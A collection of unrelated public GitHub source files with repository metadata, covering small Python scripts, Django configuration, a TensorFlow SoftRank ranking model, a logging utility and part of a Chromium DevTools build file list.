add5b4f0438ff415515818f8f466a6e88dc211ad
|
/pythoncount.py
|
8f98d156c82317b187d76712ae46595585fc2378
|
[] |
no_license
|
pavithraabhi/repo
|
93872014c81983b37d3527f9c4b7637161f38be1
|
9ad9b0f6c418e82441bd6f1af1698415cf4562f1
|
refs/heads/master
| 2020-05-28T09:13:14.971625
| 2019-08-15T15:55:25
| 2019-08-15T15:55:25
| 188,951,732
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 73
|
py
|
q=int(input())
count=0
while(q>0):
q=q//10
count+=1
print(count)
|
[
"noreply@github.com"
] |
pavithraabhi.noreply@github.com
|
c9e956b886d8dcdf622ade6c0496f384110b170c
|
c87ef08c32872450dc12eb4f744aed4a45ffa2b3
|
/accounts/urls.py
|
485d9a05266777f0cae81448adbbfb7cf84c4a70
|
[
"CC0-1.0"
] |
permissive
|
webguru071/Django-Ecommerce-Demo
|
ce9f6b09d305fab4dbe11112a037bd3b98ce6ada
|
a82e921cbec0c933eecd95a6214f484dac10d073
|
refs/heads/master
| 2023-01-06T12:19:04.202452
| 2020-01-09T06:02:09
| 2020-01-09T06:02:09
| 232,733,797
| 1
| 0
|
CC0-1.0
| 2022-12-26T20:16:13
| 2020-01-09T05:58:50
|
Python
|
UTF-8
|
Python
| false
| false
| 378
|
py
|
from django.conf.urls import url, include
from . import urls_reset
from .views import register, profile, logout, login
urlpatterns = [
url(r'^register/$', register, name='register'),
url(r'^profile/$', profile, name='profile'),
url(r'^logout/$', logout, name='logout'),
url(r'^login/$', login, name='login'),
url(r'^password-reset/', include(urls_reset)),
]
|
[
"saumenroy323@gmail.com"
] |
saumenroy323@gmail.com
|
9b21a2a6c8b79f9e3c4eff182c2ca2e856aebab3
|
da56609056dbae44701a5419a77a1c6da140306f
|
/flask-by-example/worker.py
|
24373f54a05cb90ef0cc3ec8162cf58c1c470895
|
[] |
no_license
|
aibars/python-examples
|
5e22381cad9ac7ddc463cc8fa66939c30646ce12
|
96bfdaf1bbdc56f502430ca551478830e655018a
|
refs/heads/master
| 2022-09-23T14:56:54.858293
| 2022-01-17T15:25:45
| 2022-01-17T15:25:45
| 213,754,386
| 0
| 0
| null | 2022-09-16T18:10:43
| 2019-10-08T21:05:27
|
Python
|
UTF-8
|
Python
| false
| false
| 314
|
py
|
import os
import redis
from rq import Worker, Queue, Connection
listen = ['default']
redis_url = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')
conn = redis.from_url(redis_url)
if __name__ == '__main__':
with Connection(conn):
worker = Worker(list(map(Queue, listen)))
worker.work()
|
[
"agustin.ibars@gmail.com"
] |
agustin.ibars@gmail.com
|
184ca3e5b811eacd6c90174f19b3fc4c651aaea6
|
cc718e58364101a1af040aec15dc53cb713ab9d4
|
/approachs/softrank.py
|
0be7175d913d00466d08f831ab16290bf294c90d
|
[] |
no_license
|
liupengcnu/RerankSim
|
87250ecaf0ce793e2d38982b511e969d4419f2f8
|
c53798e85ad8218e0b3ba92782edcf91c9ce5bc1
|
refs/heads/main
| 2023-05-18T15:02:58.448419
| 2021-06-10T01:32:34
| 2021-06-10T01:32:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,120
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.framework import dtypes
import numpy as np
from approachs.model import Model
from approachs.dnn_model import DNNModel
class SoftRank(DNNModel):
def __init__(self, params, model_path, model_name):
self.softRank_theta = 0.1
super(SoftRank, self).__init__(params, model_path, model_name)
def _build_net(self):
self.list_index = tf.placeholder(dtype=tf.int32, shape=(None, self.params.slate_size), name='list_index')
self.batch_index_bias = tf.placeholder(tf.int32, shape=[None])
self.batch_expansion_mat = tf.placeholder(tf.float32, shape=[None, 1])
self.batch_diag = tf.placeholder(tf.float32, shape=[None, self.params.slate_size, self.params.slate_size])
x_input = self._get_feature()
# dnn
layers = [64, 32, 1]
activation = [tf.nn.relu for _ in range(len(layers)-1)] + [None]
with tf.variable_scope('dnn'):
for i, (dim, act) in enumerate(zip(layers, activation)):
x_input = tf.layers.dense(inputs=x_input,
units=dim,
activation=act,
kernel_regularizer=tf.contrib.layers.l2_regularizer(self.params.l2_regu),
name='layer_'+str(i),
reuse=tf.AUTO_REUSE)
logits = x_input
list_labels = tf.reshape(self.y, [-1, self.params.slate_size], name='list_labels')
list_logits = tf.reshape(logits, [-1, self.params.slate_size], name='list_logits')
rank_loss = self._soft_rank_loss(list_logits, list_labels, self.list_index)
l2_loss = tf.losses.get_regularization_loss()
loss = rank_loss + l2_loss
return logits, loss
def integral_Guaussian(self, mu, theta):
a = -4.0 / math.sqrt(2.0 * math.pi) / theta
exp_mu = tf.exp(a * mu)
ig = tf.div(exp_mu, exp_mu + 1) * -1.0 + 1
return ig
def _soft_rank_loss(self, output, target_rels, target_indexs, name="softRank"):
target_indexs = [tf.reshape(x, [-1]) for x in tf.split(target_indexs, self.params.slate_size, axis=1)]
target_rels = [tf.reshape(x, [-1]) for x in tf.split(target_rels, self.params.slate_size, axis=1)]
loss = None
batch_size = tf.shape(target_rels[0])[0]
theta = 0.1
with tf.variable_scope(name):
output = tf.nn.l2_normalize(output, 1)
# compute pi_i_j
tmp = tf.concat(axis=1, values=[self.batch_expansion_mat for _ in range(self.params.slate_size)])
tmp_expand = tf.expand_dims(tmp, -2)
output_expand = tf.expand_dims(output, -2)
dif = tf.subtract(tf.matmul(tf.matrix_transpose(output_expand), tmp_expand),
tf.matmul(tf.matrix_transpose(tmp_expand), output_expand))
# unpacked_pi = self.integral_Guaussian(dif, theta)
unpacked_pi = tf.add(self.integral_Guaussian(dif, self.softRank_theta),
self.batch_diag) # make diag equal to 1.0
# may need to unpack pi: pi_i_j is the probability that i is bigger than j
pi = tf.unstack(unpacked_pi, None, 1)
for i in range(self.params.slate_size):
pi[i] = tf.unstack(pi[i], None, 1)
# compute rank distribution p_j_r
one_zeros = tf.matmul(self.batch_expansion_mat,
tf.constant([1.0] + [0.0 for r in range(self.params.slate_size - 1)], tf.float32,
[1, self.params.slate_size]))
# initial_value = tf.unpack(one_zeros, None, 1)
pr = [one_zeros for _ in range(self.params.slate_size)] # [i][r][None]
# debug_pr_1 = [one_zeros for _ in range(self.params.slate_size)] #[i][r][None]
for i in range(self.params.slate_size):
for j in range(self.params.slate_size):
# if i != j: #insert doc j
pr_1 = tf.pad(tf.stack(tf.unstack(pr[i], None, 1)[:-1], 1), [[0, 0], [1, 0]], mode='CONSTANT')
# debug_pr_1[i] = pr_1
# pr_1 = tf.concat(1, [self.batch_expansion_mat*0.0, tf.unpack(pr[i], None, 1)[:-1]])
factor = tf.tile(tf.expand_dims(pi[i][j], -1), [1, self.params.slate_size])
# print(factor.get_shape())
pr[i] = tf.add(tf.multiply(pr[i], factor),
tf.multiply(pr_1, 1.0 - factor))
# compute expected NDCG
# compute Gmax
Dr = tf.matmul(self.batch_expansion_mat,
tf.constant([1.0 / math.log(2.0 + r) for r in range(self.params.slate_size)], tf.float32,
[1, self.params.slate_size]))
gmaxs = []
for i in range(self.params.slate_size):
idx = target_indexs[i] + tf.to_int32(self.batch_index_bias)
g = embedding_ops.embedding_lookup(target_rels, idx)
gmaxs.append(g)
_gmax = tf.exp(tf.stack(gmaxs, 1)) * (1.0 / math.log(2))
Gmax = tf.reduce_sum(tf.multiply(Dr, _gmax), 1)
# compute E(Dr)
Edrs = []
for i in range(self.params.slate_size):
edr = tf.multiply(Dr, pr[i])
Edrs.append(tf.reduce_sum(edr, 1))
# compute g(j)
g = tf.exp(tf.stack(target_rels, 1)) * (1.0 / math.log(2))
dcg = tf.multiply(g, tf.stack(Edrs, 1))
Edcg = tf.reduce_sum(dcg, 1)
Ndcg = tf.div(Edcg, Gmax)
# compute loss
loss = (Ndcg * -1.0 + 1) * 10
return math_ops.reduce_sum(loss) / math_ops.cast(batch_size, dtypes.float32) # , pi, pr, Ndcg]
def train(self, samples, labels):
with self.graph.as_default():
assert samples.shape[0] == labels.shape[0]
batch_size = samples.shape[0]
size = self.params.slate_size
# feed
index = np.array(
[sorted(range(self.params.slate_size), key=lambda k:labels[i][k], reverse=True) for i in range(batch_size)]
)
batch_index_bias_v = np.array([i * self.params.slate_size for i in range(batch_size)])
batch_expansion_mat_v = np.ones((batch_size, 1))
batch_diag_v = np.array(
[np.diag([0.5 for x in range(self.params.slate_size)]) for _ in range(batch_size)]
)
# reshape
samples = samples.reshape((-1, samples.shape[-1]))
labels = labels.reshape((-1, ))
# train
_, loss, gauc, ndcg, pv_auc, step, summary = self.sess.run(
[self.opt, self.loss, self.gauc, self.ndcg, self.pv_auc, self.global_step, self.train_merged],
feed_dict={self.x: samples,
self.y: labels,
self.list_index:index,
self.batch_index_bias: batch_index_bias_v,
self.batch_expansion_mat: batch_expansion_mat_v,
self.batch_diag: batch_diag_v
})
return loss, gauc, ndcg, pv_auc, step, summary
def evaluate(self, samples, labels):
with self.graph.as_default():
batch_size = samples.shape[0]
# feed
index = np.array(
[sorted(range(self.params.slate_size), key=lambda k:labels[i][k], reverse=True) for i in range(batch_size)]
)
batch_index_bias_v = np.array([i * self.params.slate_size for i in range(batch_size)])
batch_expansion_mat_v = np.ones((batch_size, 1))
batch_diag_v = np.array(
[np.diag([0.5 for x in range(self.params.slate_size)]) for _ in range(batch_size)]
)
# reshape
samples = samples.reshape((-1, samples.shape[-1]))
labels = labels.reshape((-1, ))
#
loss, gauc, ndcg, pv_auc, step, summary = self.sess.run(
[self.loss, self.gauc, self.ndcg, self.pv_auc, self.global_step, self.test_merged],
feed_dict={self.x: samples,
self.y: labels,
self.list_index:index,
self.batch_index_bias: batch_index_bias_v,
self.batch_expansion_mat: batch_expansion_mat_v,
self.batch_diag: batch_diag_v
})
return loss, gauc, ndcg, pv_auc, step, summary
|
[
"yongqing.gyq@alibaba-inc.com"
] |
yongqing.gyq@alibaba-inc.com
|
65affae5a631c8898bb4d018b1b598f62f2ed797
|
0d79a06910b89bbbc8fe9129f6f9703392d7cbfc
|
/NeuralNetwork.py
|
162570fbe9cf6e53fc6cca761ac6a1c129e5976a
|
[
"MIT"
] |
permissive
|
codym95/Neuralectric
|
310e234c3bda1538dd9ef2d0cc89d38e925c14a0
|
af2b0355f37654b1cce34c4a6246d8d303be7b3e
|
refs/heads/master
| 2020-04-04T21:23:52.655733
| 2018-11-05T06:59:17
| 2018-11-05T06:59:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,265
|
py
|
import numpy as np
# X = (hours sleeping, hours studying), y = score on test
#X = np.array(([2, 9], [1, 5], [3, 6]), dtype=float)
#y = np.array(([92], [86], [89]), dtype=float)
X = np.array(([0, 0], [0, 1], [1, 0], [1, 1]),)
y = np.array(([0], [1], [1], [0]),)
class NeuralNetwork(object):
def __init__(self):
#parameters
self.inputSize = 2
self.outputSize = 1
self.hiddenSize = 3
self.learningrate = 0.01
self.W1 = np.random.randn(self.inputSize, self.hiddenSize)
self.W2 = np.random.randn(self.hiddenSize, self.outputSize)
def forward(self, X):
#forward propagation through our network
self.z = np.dot(X, self.W1) # dot product of X (input) and first set of 3x2 weights
self.z2 = self.relu(self.z) # activation function
self.z3 = np.dot(self.z2, self.W2) # dot product of hidden layer (z2) and second set of 3x1 weights
o = self.relu(self.z3) # final activation function
return o
def sigmoid(self, s):
# activation function
return 1/(1+np.exp(-s))
def sigmoidPrime(self, s):
#derivative of sigmoid
return s * (1 - s)
def relu(self, x):
return np.where(x < 0, 0.01 * x, x)
def relu_d(self, x):
return np.where(x < 0, 0.01, 1)
def backward(self, X, y, o):
# backward propgate through the network
self.o_error = y - o # error in output
self.o_delta = self.o_error*self.relu_d(o) # applying derivative of sigmoid to error
self.z2_error = self.o_delta.dot(self.W2.T) # z2 error: how much our hidden layer weights contributed to output error
self.z2_delta = self.z2_error*self.relu_d(self.z2) # applying derivative of sigmoid to z2 error
self.W1 += X.T.dot(self.z2_delta)*self.learningrate # adjusting first set (input --> hidden) weights
self.W2 += self.z2.T.dot(self.o_delta)*self.learningrate # adjusting second set (hidden --> output) weights
def train (self, X, y):
o = self.forward(X)
self.backward(X, y, o)
NN = Neural_Network()
for i in range(20000): # trains the NN 1,000 times
print("Input: \n" + str(X))
print("Actual Output: \n" + str(y))
print("Predicted Output: \n" + str(NN.forward(X)))
print("Loss: \n" + str(np.mean(np.square(y - NN.forward(X))))) # mean sum squared loss
print("\n")
NN.train(X, y)
|
[
"jrcoop34@gmail.com"
] |
jrcoop34@gmail.com
|
650c6a4a6b0f91ab1d27334a8a3a9252847cb343
|
6b320577d0d89f24f08098939ef9c4f548a21a06
|
/data.py
|
005b858cc48ec235b7490ea21dcbafa1eb83874c
|
[] |
no_license
|
ShreyesBhat/StudentInformationSystem
|
46bb20c2aa4830f3d7807773a62740bb1a3954e1
|
117b86b7a3e1503103499827a5aa5ce062710e11
|
refs/heads/master
| 2020-04-10T23:44:06.578438
| 2018-08-08T15:20:51
| 2018-08-08T15:20:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
def Semesters():
semesters = [
{
'id' : 1,
'title':'First',
},
{
'id' : 2,
'title':'Second',
},
{
'id' : 3,
'title':'Third',
},
{
'id' : 4,
'title':'Fourth',
},
{
'id' : 5,
'title':'Fifth',
},
{
'id' : 6,
'title':'Sixth',
},
{
'id' : 7,
'title':'Seventh',
},
{
'id' : 8,
'title':'Eight',
},
]
return semesters
|
[
"akshay.madiwalar@thughtclan.com"
] |
akshay.madiwalar@thughtclan.com
|
7300a81feea9fcbde4bbb73d634e207a77dccfdf
|
2e63d5782d19628006a5902db6ff40765a262530
|
/manage.py
|
afbb6c208b74e367b68582bd5fac408b5ff5e43b
|
[] |
no_license
|
gkuwanto/metalurgi_dosen
|
fdf5e21d1a5d8913593c261f5d2449beb5a685a4
|
66582d50c5b0984788702452d063bf6f0ea02829
|
refs/heads/master
| 2020-12-15T16:07:45.611920
| 2020-01-20T19:50:33
| 2020-01-20T19:50:33
| 235,170,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'metalurgi.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"gkuwanto@gmail.com"
] |
gkuwanto@gmail.com
|
63ff19314e24c7019278ccd81b420f97afa939cb
|
b2c637c4b27b05f5d9ce933baba96480a46b61f1
|
/ex043.py
|
e5dddbb7152567060e82319e0779b0d579f67b2b
|
[] |
no_license
|
LucasSM18/Aulas-de-Python---Exercicios-resolvidos
|
7aa55ebea0099d29beb288c9ff49c642ef0db898
|
e56abe97f2ba941b7cf0ccf6de7d679b621ed995
|
refs/heads/main
| 2022-12-30T02:51:09.588960
| 2020-10-19T16:59:52
| 2020-10-19T16:59:52
| 305,453,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
from datetime import date
ano = int(input('Ano de Nascimento: '))
atual = date.today().year
idade = atual - ano
print('O atleta tem {} anos'.format(idade))
if idade <= 9:
print('Classificação: MIRIM')
elif idade <= 14:
print('Classificação: INFANTIL')
elif idade <= 19:
print('Classificação: JUNIOR')
elif idade <= 25:
print('Classificação: SÊNIOR')
else:
print('Classificação: MASTER')
|
[
"noreply@github.com"
] |
LucasSM18.noreply@github.com
|
6042e2224d0212c185b9add12624f576174a1060
|
5de041cce04d994b899d169186c039a233dc2501
|
/utils/my_logger.py
|
2ef75e21b975c620529a65db946bc39dfab15fed
|
[] |
no_license
|
keyzf/AutoTest_UI
|
d3ea3a51abc95520fac8761a95744757ce8fac15
|
8cbb984e96452c20e0a24543946030f7ef9a3b02
|
refs/heads/master
| 2022-11-24T23:23:32.227602
| 2020-07-27T15:00:14
| 2020-07-27T15:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,762
|
py
|
import logging
from config.PATH import *
import time
from utils.common import *
from utils.read_yaml import ReadYaml
day = time.strftime('%Y-%m-%d', time.localtime(time.time()))
file = os.path.join(TEST_LOG, '{}.log'.format(day))
yaml_data = ReadYaml(YAML).get_yaml()
class MyLog:
def __init__(self,
module_name,
all_level="DEBUG",
stream_level="INFO",
file_level="INFO",
all_format="[%(asctime)s] %(levelname)s [%(filename)s, %(lineno)d] %(message)s",
date_format="%Y-%m-%d %H:%M:%S",
log_file=file):
if not os.path.exists(TEST_LOG):
os.mkdir(TEST_LOG) # 创建测试日志目录
if not os.path.exists(log_file):
open(log_file, 'w') # 创建测试日志文件
self.logger = logging.getLogger(module_name) # log收集器
self.logger.setLevel(all_level) # 定义收集器的信息级别
self.log_format = logging.Formatter(
fmt=all_format,
datefmt=date_format) # 定义日志的格式
# 控制台输出日志
self.ch = logging.StreamHandler() # 控制台输出句柄
self.ch.setFormatter(self.log_format) # 控制台输出的信息格式
self.ch.setLevel(stream_level) # 控制台输出的信息级别
# 文件输出日志
self.fh = logging.FileHandler(filename=log_file, mode='a', encoding='utf-8') # mode='a' 追加写入模式
self.fh.setFormatter(self.log_format) # 文件输出的信息格式
self.fh.setLevel(file_level) # 文件输出的信息级别
# 加载输出句柄
self.logger.addHandler(self.ch) # 把流媒体添加到控制台输出句柄内
self.logger.addHandler(self.fh)
def __del__(self):
self.delete_handle()
def get_logger(self):
return self.logger
def delete_handle(self):
# 移除输出句柄,避免重复输出
self.logger.removeHandler(self.ch)
self.logger.removeHandler(self.fh)
# 关闭 .log 文件,释放内存
self.ch.close()
self.fh.close()
my_logger = MyLog(module_name=get_module_name(),
all_level=yaml_data["logger"]["all_level"],
stream_level=yaml_data["logger"]["stream_level"],
file_level=yaml_data["logger"]["file_level"],
all_format=yaml_data["logger"]["all_format"],
date_format=yaml_data["logger"]["date_format"])
log = my_logger.get_logger()
if __name__ == '__main__':
# log.debug("输出一个debug")
# log.info("输出一个info")
# log.warning("输出一个warning")
# log.error("输出一个error")
pass
|
[
"2398335323@qq.com"
] |
2398335323@qq.com
|
6b77faebaa6f3446a44f263b97518ca25808ff57
|
17fb5e4cdcf8e557bd0ab8606dfd88074dc4d525
|
/ticket_26333/models.py
|
0cbe86a46dbea612388e84d5022281172a510cc1
|
[] |
no_license
|
charettes/django-ticketing
|
0b17c85afa049d1b73db244e1199798feb9a4b73
|
78ed6a345e760ea46434690e9385ae4d26fc2810
|
refs/heads/master
| 2021-01-17T06:38:35.337305
| 2016-06-15T02:33:38
| 2016-06-15T02:33:38
| 45,122,368
| 0
| 1
| null | 2016-02-09T20:21:48
| 2015-10-28T15:30:59
|
Python
|
UTF-8
|
Python
| false
| false
| 255
|
py
|
from django.contrib.gis.db import models as gis
from django.contrib.gis.geos import Point
from django.db import models
POINT = Point(-104.9903, 39.7392, srid=4326)
class PagedModel(models.Model):
location = gis.PointField(srid=4326, default=POINT)
|
[
"charette.s@gmail.com"
] |
charette.s@gmail.com
|
6a41ebef16e06874f1aab4ac728641e3b01e0900
|
bb6ebff7a7f6140903d37905c350954ff6599091
|
/third_party/WebKit/Source/devtools/devtools.gypi
|
7352471a16d41573bde00923debb78f710603bdf
|
[
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] |
permissive
|
PDi-Communication-Systems-Inc/lollipop_external_chromium_org
|
faa6602bd6bfd9b9b6277ce3cd16df0bd26e7f2f
|
ccadf4e63dd34be157281f53fe213d09a8c66d2c
|
refs/heads/master
| 2022-12-23T18:07:04.568931
| 2016-04-11T16:03:36
| 2016-04-11T16:03:36
| 53,677,925
| 0
| 1
|
BSD-3-Clause
| 2022-12-09T23:46:46
| 2016-03-11T15:49:07
|
C++
|
UTF-8
|
Python
| false
| false
| 27,014
|
gypi
|
#
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'variables': {
# If debug_devtools is set to 1, JavaScript files for DevTools are
# stored as is. Otherwise, a concatenated file is stored.
'debug_devtools%': 0,
'devtools_core_js_files': [
'<@(devtools_core_base_js_files)',
'<@(devtools_common_js_files)',
'<@(devtools_sdk_js_files)',
'<@(devtools_ui_js_files)',
'<@(devtools_components_js_files)',
],
'devtools_core_base_js_files': [
'front_end/inspector.html',
'front_end/Tests.js',
'front_end/ForwardedInputEventHandler.js',
'front_end/InspectorFrontendAPI.js',
'front_end/InspectorFrontendEventSink.js',
'front_end/InspectorFrontendHostStub.js',
'front_end/jsdifflib.js',
'front_end/MediaQueryInspector.js',
'front_end/ResponsiveDesignView.js',
'front_end/ScreencastView.js',
'front_end/TestController.js',
'front_end/dialog.css',
'front_end/inspector.css',
'front_end/tabbedPane.css',
'front_end/inspectorSyntaxHighlight.css',
'front_end/popover.css',
'<@(devtools_main_js_files)',
'<@(devtools_standalone_files)',
],
'devtools_common_js_files': [
'front_end/common/Color.js',
'front_end/common/CompletionDictionary.js',
'front_end/common/DOMExtension.js',
'front_end/common/Geometry.js',
'front_end/common/MessageSink.js',
'front_end/common/ModuleManager.js',
'front_end/common/modules.js',
'front_end/common/Object.js',
'front_end/common/ParsedURL.js',
'front_end/common/Platform.js',
'front_end/common/Progress.js',
'front_end/common/Settings.js',
'front_end/common/TextRange.js',
'front_end/common/Throttler.js',
'front_end/common/UIString.js',
'front_end/common/UserMetrics.js',
'front_end/common/utilities.js',
'front_end/common/WebInspector.js',
],
'devtools_sdk_js_files': [
'front_end/sdk/ApplicationCacheModel.js',
'front_end/sdk/CompilerScriptMapping.js',
'front_end/sdk/ConsoleModel.js',
'front_end/sdk/ContentProvider.js',
'front_end/sdk/ContentProviderBasedProjectDelegate.js',
'front_end/sdk/ContentProviders.js',
'front_end/sdk/CookieParser.js',
'front_end/sdk/CPUProfileModel.js',
'front_end/sdk/CPUProfilerModel.js',
'front_end/sdk/CSSMetadata.js',
'front_end/sdk/CSSParser.js',
'front_end/sdk/CSSStyleModel.js',
'front_end/sdk/CSSStyleSheetMapping.js',
'front_end/sdk/BreakpointManager.js',
'front_end/sdk/DOMModel.js',
'front_end/sdk/DOMStorage.js',
'front_end/sdk/Database.js',
'front_end/sdk/DebuggerModel.js',
'front_end/sdk/DebuggerScriptMapping.js',
'front_end/sdk/DefaultScriptMapping.js',
'front_end/sdk/FileManager.js',
'front_end/sdk/FileSystemMapping.js',
'front_end/sdk/FileSystemModel.js',
'front_end/sdk/FileSystemWorkspaceBinding.js',
'front_end/sdk/FileUtils.js',
'front_end/sdk/IndexedDBModel.js',
'front_end/sdk/InspectorBackend.js',
'front_end/sdk/IsolatedFileSystemManager.js',
'front_end/sdk/IsolatedFileSystem.js',
'front_end/sdk/LayerTreeModel.js',
'front_end/sdk/Linkifier.js',
'front_end/sdk/LiveEditSupport.js',
'front_end/sdk/NetworkLog.js',
'front_end/sdk/NetworkManager.js',
'front_end/sdk/NetworkRequest.js',
'front_end/sdk/NetworkUISourceCodeProvider.js',
'front_end/sdk/NetworkWorkspaceBinding.js',
'front_end/sdk/NotificationService.js',
'front_end/sdk/OverridesSupport.js',
'front_end/sdk/PaintProfiler.js',
'front_end/sdk/PowerProfiler.js',
'front_end/sdk/PresentationConsoleMessageHelper.js',
'front_end/sdk/RemoteObject.js',
'front_end/sdk/Resource.js',
'front_end/sdk/ResourceScriptMapping.js',
'front_end/sdk/ResourceTreeModel.js',
'front_end/sdk/ResourceType.js',
'front_end/sdk/ResourceUtils.js',
'front_end/sdk/RuntimeModel.js',
'front_end/sdk/SASSSourceMapping.js',
'front_end/sdk/Script.js',
'front_end/sdk/ScriptSnippetModel.js',
'front_end/sdk/SearchConfig.js',
'front_end/sdk/SnippetStorage.js',
'front_end/sdk/SourceMap.js',
'front_end/sdk/SourceMapping.js',
'front_end/sdk/StylesSourceMapping.js',
'front_end/sdk/Target.js',
'front_end/sdk/TempFile.js',
'front_end/sdk/TimelineManager.js',
'front_end/sdk/UISourceCode.js',
'front_end/sdk/WorkerManager.js',
'front_end/sdk/WorkerTargetManager.js',
'front_end/sdk/Workspace.js',
'front_end/sdk/WorkspaceController.js',
],
'devtools_ui_js_files': [
'front_end/ui/ActionRegistry.js',
'front_end/ui/Checkbox.js',
'front_end/ui/Context.js',
'front_end/ui/ContextMenu.js',
'front_end/ui/DataGrid.js',
'front_end/ui/Dialog.js',
'front_end/ui/DropDownMenu.js',
'front_end/ui/EmptyView.js',
'front_end/ui/InplaceEditor.js',
'front_end/ui/KeyboardShortcut.js',
'front_end/ui/PieChart.js',
'front_end/ui/Popover.js',
'front_end/ui/ProgressIndicator.js',
'front_end/ui/ResizerWidget.js',
'front_end/ui/SettingsUI.js',
'front_end/ui/SidebarPane.js',
'front_end/ui/SidebarTreeElement.js',
'front_end/ui/ShortcutRegistry.js',
'front_end/ui/ShowMoreDataGridNode.js',
'front_end/ui/SoftContextMenu.js',
'front_end/ui/SplitView.js',
'front_end/ui/StackView.js',
'front_end/ui/StatusBarButton.js',
'front_end/ui/SuggestBox.js',
'front_end/ui/TabbedPane.js',
'front_end/ui/TextEditor.js',
'front_end/ui/TextPrompt.js',
'front_end/ui/TextUtils.js',
'front_end/ui/UIUtils.js',
'front_end/ui/View.js',
'front_end/ui/ViewportControl.js',
'front_end/ui/ZoomManager.js',
'front_end/ui/treeoutline.js',
],
'devtools_components_js_files': [
'front_end/components/CookiesTable.js',
'front_end/components/DockController.js',
'front_end/components/Drawer.js',
'front_end/components/DOMBreakpointsSidebarPane.js',
'front_end/components/DOMPresentationUtils.js',
'front_end/components/ExecutionContextSelector.js',
'front_end/components/ExtensionServerProxy.js',
'front_end/components/FilterBar.js',
'front_end/components/FilterSuggestionBuilder.js',
'front_end/components/FlameChart.js',
'front_end/components/HandlerRegistry.js',
'front_end/components/HelpScreen.js',
'front_end/components/InspectElementModeController.js',
'front_end/components/InspectedPagePlaceholder.js',
'front_end/components/InspectorView.js',
'front_end/components/NativeBreakpointsSidebarPane.js',
'front_end/components/ObjectPopoverHelper.js',
'front_end/components/ObjectPropertiesSection.js',
'front_end/components/OverviewGrid.js',
'front_end/components/Panel.js',
'front_end/components/PropertiesSection.js',
'front_end/components/SearchableView.js',
'front_end/components/Section.js',
'front_end/components/ShortcutsScreen.js',
'front_end/components/TimelineGrid.js',
'front_end/components/WorkerFrontendManager.js',
],
'devtools_main_js_files': [
'front_end/main/AdvancedApp.js',
'front_end/main/App.js',
'front_end/main/HelpScreenUntilReload.js',
'front_end/main/ScreencastApp.js',
'front_end/main/SimpleApp.js',
'front_end/main/Main.js',
],
'devtools_module_json_files': [
'front_end/audits/module.json',
'front_end/console/module.json',
'front_end/devices/module.json',
'front_end/elements/module.json',
'front_end/extensions/module.json',
'front_end/layers/module.json',
'front_end/main/module.json',
'front_end/network/module.json',
'front_end/profiler/module.json',
'front_end/resources/module.json',
'front_end/search/module.json',
'front_end/settings/module.json',
'front_end/source_frame/module.json',
'front_end/sources/module.json',
'front_end/timeline/module.json',
],
'all_devtools_files': [
'<@(devtools_core_js_files)',
'<@(devtools_modules_js_files)',
'<@(devtools_cm_css_files)',
'<@(devtools_cm_js_files)',
'<@(devtools_module_json_files)',
],
'devtools_standalone_files': [
'front_end/accelerometer.css',
'front_end/auditsPanel.css',
'front_end/breadcrumbList.css',
'front_end/breakpointsList.css',
'front_end/dataGrid.css',
'front_end/devicesView.css',
'front_end/elementsPanel.css',
'front_end/filter.css',
'front_end/filteredItemSelectionDialog.css',
'front_end/flameChart.css',
'front_end/heapProfiler.css',
'front_end/helpScreen.css',
'front_end/indexedDBViews.css',
'front_end/inspectorCommon.css',
'front_end/navigatorView.css',
'front_end/networkLogView.css',
'front_end/networkPanel.css',
'front_end/overrides.css',
'front_end/panelEnablerView.css',
'front_end/profilesPanel.css',
'front_end/resourceView.css',
'front_end/resourcesPanel.css',
'front_end/responsiveDesignView.css',
'front_end/revisionHistory.css',
'front_end/screencastView.css',
'front_end/sidebarPane.css',
